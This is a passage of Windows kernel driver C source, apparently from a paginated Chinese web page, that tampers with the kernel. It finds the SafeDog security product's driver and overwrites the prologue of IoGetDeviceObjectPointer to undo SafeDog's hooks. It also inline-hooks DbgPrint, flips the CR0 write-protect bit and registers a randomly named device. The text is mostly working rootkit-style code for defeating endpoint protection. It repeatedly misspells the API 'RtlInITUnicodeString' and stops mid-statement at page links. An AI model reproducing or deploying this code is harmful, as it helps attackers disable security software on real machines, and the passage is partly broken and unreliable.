*(ULONG*)((ULONG)recover+9)=*(ULONG*)MmUserProbeAddress;
pointer=(ULONG)recover;
for(i=0;i<13;i++,foundaddr++,pointer++)
*(unsigned char*)foundaddr=*(unsigned char*)pointer;
}
RtlInITUnicodeString(&safedog,L"\\Driver\\SafeDog");
if ( !ObReferenceObjectByName(&safedog, 64, 0, OBJ_CASE_INSENSITIVE, *IoDriverObjectType, 0, 0, &dogdrv))
{
if(dogdrv)
{
iopointer=(ULONG)IoGetDeviceObjectPointer;
*(unsigned char*)(iopointer)=0x8b;
*(unsigned char*)(iopointer+1)=0xff;
*(unsigned char*)(iopointer+2)=0x55;
*(unsigned char*)(iopointer+3)=0x8b;
*(unsigned char*)(iopointer+4)=0xec;
}
}
dbgpoint=(ULONG)DbgPrint;//inline DbgPrint()
retaddr=dbgpoint+5;
*(unsigned char*)dbgpoint=0xE9;
*(ULONG*)((ULONG)dbgpoint+1)=(ULONG)MyDbgPrint-(ULONG)dbgpoint-5;
__asm
{
mov eax, CR0
or eax, NOT 0FFFEFFFFh
mov CR0, eax
}
}
NTSTATUS
Dispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
){
IofCompleteRequest(Irp, 0);
return 0;
}
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING SymbolicLinkName;
RtlInITUnicodeString(&SymbolicLinkName,L"\\DosDevices\\32ef43d02471c26e");
IoDeleteSymbolicLink(&SymbolicLinkName);
IoDeleteDevice(DriverObject->DeviceObject);
}
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath)
{
PDEVICE_OBJECT DeviceObject;
UNICODE_STRING DeviceName;
UNICODE_STRING SymbolicLinkName;
RtlInITUnicodeString(&DeviceName,L"\\Device\\32ef43d02471c26e");//随机生成的路径
RtlInITUnicodeString(&SymbolicLinkName,L"\\DosDevices\\32ef43d02471c26e");
if ( !IoCreate << 上一页 [11] [12] 下一页
|
